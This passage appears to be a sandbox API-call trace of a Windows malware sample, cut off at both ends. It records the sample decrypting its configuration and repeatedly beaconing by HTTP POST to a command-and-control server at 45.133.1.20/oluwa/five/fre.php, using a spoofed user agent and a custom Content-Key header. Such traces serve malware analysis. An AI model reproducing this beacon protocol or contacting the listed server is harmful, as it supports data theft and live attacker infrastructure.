(HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0307.564] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.564] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0307.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.566] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0307.581] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.581] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0307.581] GetProcessHeap () returned 0x6a0000 [0307.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0307.583] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.584] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0307.585] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.585] CryptDestroyKey (hKey=0x6ad020) returned 1 [0307.586] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.586] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0307.587] GetProcessHeap () returned 0x6a0000 [0307.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0307.587] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0307.588] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0307.589] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0307.589] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0307.594] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0307.594] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0307.595] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0307.596] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0307.596] GetProcessHeap () returned 0x6a0000 [0307.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0307.596] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0307.596] GetProcessHeap () returned 0x6a0000 [0307.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa30 [0307.596] socket (af=2, type=1, protocol=6) returned 0xba4 [0307.597] connect (s=0xba4, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0307.625] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0307.625] GetProcessHeap () returned 0x6a0000 [0307.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0307.625] GetProcessHeap () returned 0x6a0000 [0307.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6def40 [0307.626] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0307.628] wvsprintfA (in: param_1=0x6def40, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0307.628] GetProcessHeap () returned 0x6a0000 [0307.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b6a80 [0307.628] GetProcessHeap () returned 0x6a0000 [0307.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0307.628] GetProcessHeap () returned 0x6a0000 [0307.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0307.628] GetProcessHeap () returned 0x6a0000 [0307.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6def40 [0307.629] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0307.631] wvsprintfA (in: param_1=0x6def40, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0307.631] GetProcessHeap () returned 0x6a0000 [0307.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0307.631] GetProcessHeap () returned 0x6a0000 [0307.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0307.634] send (s=0xba4, buf=0x6bd460*, len=242, flags=0) returned 242 [0307.636] send (s=0xba4, buf=0x6bb998*, len=159, flags=0) returned 159 [0307.636] GetProcessHeap () returned 0x6a0000 [0307.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0307.636] recv (in: s=0xba4, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0307.729] GetProcessHeap () returned 0x6a0000 [0307.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0307.729] GetProcessHeap () returned 0x6a0000 [0307.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0307.730] GetProcessHeap () returned 0x6a0000 [0307.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6a80 | out: hHeap=0x6a0000) returned 1 [0307.730] GetProcessHeap () returned 0x6a0000 [0307.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0307.731] closesocket (s=0xba4) returned 0 [0307.733] GetProcessHeap () returned 0x6a0000 [0307.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa30 | out: hHeap=0x6a0000) returned 1 [0307.733] GetProcessHeap () returned 0x6a0000 [0307.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0307.733] GetProcessHeap () returned 0x6a0000 [0307.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0307.734] GetProcessHeap () returned 0x6a0000 [0307.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0307.734] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18e4) returned 0xba4 [0307.755] Sleep (dwMilliseconds=0xea60) [0307.757] GetProcessHeap () returned 0x6a0000 [0307.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0307.758] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.759] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0307.771] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.772] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0307.817] GetProcessHeap () returned 0x6a0000 [0307.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0307.818] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.819] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0307.819] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.820] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0307.821] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.821] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0307.821] GetProcessHeap () returned 0x6a0000 [0307.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0307.822] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.823] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0307.824] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.824] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0307.825] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.826] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0307.826] GetProcessHeap () returned 0x6a0000 [0307.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0307.826] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0307.827] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0307.831] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0307.831] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0307.832] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0307.832] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0307.833] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0307.834] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0307.834] GetProcessHeap () returned 0x6a0000 [0307.834] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0307.834] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0307.834] GetProcessHeap () returned 0x6a0000 [0307.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0307.837] GetProcessHeap () returned 0x6a0000 [0307.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0307.837] GetProcessHeap () returned 0x6a0000 [0307.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0307.838] GetProcessHeap () returned 0x6a0000 [0307.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0307.842] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.842] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0307.862] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.862] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0307.871] GetProcessHeap () returned 0x6a0000 [0307.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0307.874] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.874] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0307.875] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.876] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0307.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.877] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0307.877] GetProcessHeap () returned 0x6a0000 [0307.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0307.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.879] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0307.880] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.880] CryptDestroyKey (hKey=0x6ad020) returned 1 [0307.881] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0307.884] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0307.884] GetProcessHeap () returned 0x6a0000 [0307.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0307.884] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0307.885] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0307.885] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0307.886] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0307.886] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0307.887] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0307.888] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0307.888] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0307.888] GetProcessHeap () returned 0x6a0000 [0307.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0307.888] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0307.888] GetProcessHeap () returned 0x6a0000 [0307.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba990 [0307.888] socket (af=2, type=1, protocol=6) returned 0xba8 [0307.890] connect (s=0xba8, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0307.921] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0307.921] GetProcessHeap () returned 0x6a0000 [0307.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0307.921] GetProcessHeap () returned 0x6a0000 [0307.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6def40 [0307.922] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0307.923] wvsprintfA (in: param_1=0x6def40, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0307.923] GetProcessHeap () returned 0x6a0000 [0307.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b69c0 [0307.923] GetProcessHeap () returned 0x6a0000 [0307.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0307.923] GetProcessHeap () returned 0x6a0000 [0307.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0307.923] GetProcessHeap () returned 0x6a0000 [0307.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6def40 [0307.924] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0307.925] wvsprintfA (in: param_1=0x6def40, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0307.925] GetProcessHeap () returned 0x6a0000 [0307.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0307.925] GetProcessHeap () returned 0x6a0000 [0307.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0307.926] send (s=0xba8, buf=0x6bd460*, len=242, flags=0) returned 242 [0307.929] send (s=0xba8, buf=0x6bb998*, len=159, flags=0) returned 159 [0307.930] GetProcessHeap () returned 0x6a0000 [0307.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0307.930] recv (in: s=0xba8, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0307.997] GetProcessHeap () returned 0x6a0000 [0307.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0307.998] GetProcessHeap () returned 0x6a0000 [0307.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0307.999] GetProcessHeap () returned 0x6a0000 [0307.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b69c0 | out: hHeap=0x6a0000) returned 1 [0307.999] GetProcessHeap () returned 0x6a0000 [0307.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0307.999] closesocket (s=0xba8) returned 0 [0308.000] GetProcessHeap () returned 0x6a0000 [0308.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba990 | out: hHeap=0x6a0000) returned 1 [0308.000] GetProcessHeap () returned 0x6a0000 [0308.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0308.001] GetProcessHeap () returned 0x6a0000 [0308.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0308.001] GetProcessHeap () returned 0x6a0000 [0308.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0308.002] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18e8) returned 0xba8 [0308.004] Sleep (dwMilliseconds=0xea60) [0308.006] GetProcessHeap () returned 0x6a0000 [0308.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0308.007] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.007] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0308.013] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.017] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0308.028] GetProcessHeap () returned 0x6a0000 [0308.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0308.029] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.029] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0308.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.030] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0308.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.032] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0308.032] GetProcessHeap () returned 0x6a0000 [0308.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0308.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.033] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0308.034] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.035] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0308.036] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.036] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0308.036] GetProcessHeap () returned 0x6a0000 [0308.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0308.041] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0308.041] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0308.113] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0308.116] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0308.117] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0308.117] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0308.118] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0308.119] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0308.119] GetProcessHeap () returned 0x6a0000 [0308.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0308.119] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0308.119] GetProcessHeap () returned 0x6a0000 [0308.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0308.120] GetProcessHeap () returned 0x6a0000 [0308.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0308.120] GetProcessHeap () returned 0x6a0000 [0308.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0308.120] GetProcessHeap () returned 0x6a0000 [0308.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0308.121] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.122] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0308.131] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.131] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0308.145] GetProcessHeap () returned 0x6a0000 [0308.145] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0308.146] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.147] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0308.151] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.152] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0308.152] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.153] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0308.153] GetProcessHeap () returned 0x6a0000 [0308.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0308.154] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.154] CryptDecrypt (in: 